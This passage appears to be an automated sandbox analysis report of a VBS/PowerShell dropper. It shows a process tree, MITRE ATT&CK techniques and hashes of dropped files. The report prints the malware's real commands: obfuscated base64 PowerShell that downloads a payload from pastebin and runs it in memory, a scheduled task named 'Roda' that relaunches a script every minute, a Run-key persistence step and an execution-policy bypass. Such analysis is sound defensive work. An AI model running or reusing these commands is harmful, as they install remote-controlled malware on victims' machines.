0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:632
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        7⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4352
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1228
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2060
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4272
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
        7⤵
        Creates scheduled task(s)
        
        PID:652
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4968
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:2004

C:\Windows\system32\wscript.exe
wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
1⤵
- Checks computer location settings
PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2264
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
    3⤵
    - Checks computer location settings
    PID:3900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        7⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:444
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
        6⤵
        
        PID:1068
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
        7⤵
        Creates scheduled task(s)
        
        PID:5076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5048
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:1532
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
701B

MD5
5de8527438c860bfa3140dc420a03e52

SHA1
235af682986b3292f20d8d71a8671353f5d6e16d

SHA256
d9d92cd6e7a4507912965138b8d1eabb3f188f4dfcb61115ee99dc2c0fd43a92

SHA512
77c3a774a2235c55ad520f1bf0c71fa3d3f0e7cf478a78e0d4dd6d253ee12a9859acc9ee822664467387788a2655a18373c8fcf08ea0d001549d3d4391b00bf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
e2a7fc20b443bab1d5f443e5cced0003

SHA1
fd875f15cf9bdea6d2e507365529fe151e26e399

SHA256
b977c66cd381a362076f0634005a18dbe3644cacb8d17f710076f39fb9e8d72f

SHA512
0442337dde316986c1b637ec1ee54159521a6b5b45cb1d6dcb07e16abd1babdd688d13132300f85e716c80c916f0e3ec04cf538a08a21a1efbf6737d6944ebed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ee79fab36a9698b54d846b91efc77ed

SHA1
582ccc9c6c35b35868ade0fa47ced2f2026698aa

SHA256
70618c34c5b82202021fc293d84807ea3000890f3b8e33450d69d2a137d2662c

SHA512
1cc9f30d55f910165496539181dc121f6c1d7b3a07f7da1e5efb3ca9f52f28ceae6fde3ee0bf0782256d5ab901a7d09913326a1fa072281b8621e0ef2591f0d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
292B

MD5
464bfae90ec8c9c5babaa5e01e226edf

SHA1
f3101081559f77744b8c7b9c1e17210296d54d18

SHA256
607566895ef5450ee433f910b2772767e232702903830f5e371ee934fc1626e5

SHA512
f8bd808ee5bf2df3695acc2f4318ac3c4ae8e1edc5da2dcb506534d0b13dc15adf8622dbc752cecc9a25fef7643d3109ac1b69111087dc3e12f89e9cd47e4207

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5722dc3c74eaab74358d24ca7f5ba47e

SHA1
bd7261b0ff786d6fd64148400a62fbf36687bb2e

SHA256
d00f9268fa6a2d245baa9039c6582d04772d1b80971c5fb97fb7608846571881

SHA512
07edfca0ca2bbff4e7c3faa78e7bb853ca1462ec8d0c5ed896e8fe44f3f7c4fc2cb297aa9e07b69626ddeb7e4b899c95291d968e0c409050d80b63a6c6d62ac4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
560B

MD5
56fc4df3387e084b9117df81e8a25ef9

SHA1
f72d892772f0078e7391d68c14ff0f108958fce0

SHA256
454b854f519ffa3d147ee38d22673046fddce1d4d98d13cbf5aa411d367e18b3

SHA512
29506fb65b634d305c21f226b0e0cf48c65a5df72952892fb8fb9655e2661e2db6613f3fc52e5809abb025b15c7173d3b5db4a288a0ff805dc57c56fc4ec5f0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qk5y33mi.3vl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx.vbs

Filesize
240B

MD5
7d22f89cf35058b7ea6930b0bf004cdd

SHA1
ebbc8e09268dd62d380f17899f21f8ede7f5527a

SHA256
38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3

SHA512
19cfae6e5a917902ec054106170851e14968858481a46636f3a0bf136c57f2789455d34b4511d0060c23cf479bc560a2ebe1c3fb1abee7469617e54b978e6c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx.vbs

Filesize
240B

MD5
7d22f89cf35058b7ea6930b0bf004cdd

SHA1
ebbc8e09268dd62d380f17899f21f8ede7f5527a

SHA256
38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3

SHA512
19cfae6e5a917902ec054106170851e14968858481a46636f3a0bf136c57f2789455d34b4511d0060c23cf479bc560a2ebe1c3fb1abee7469617e54b978e6c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
234B

MD5
aa2673120915805f0d3dcf1673c6fc61

SHA1
0ada860b2401d0b3b185f7c0aede8110b5851b8d

SHA256
76015afe0875b5f7af6112f180ece1e1da5946da18ed4cd9be2bbc43fb15ebd2

SHA512
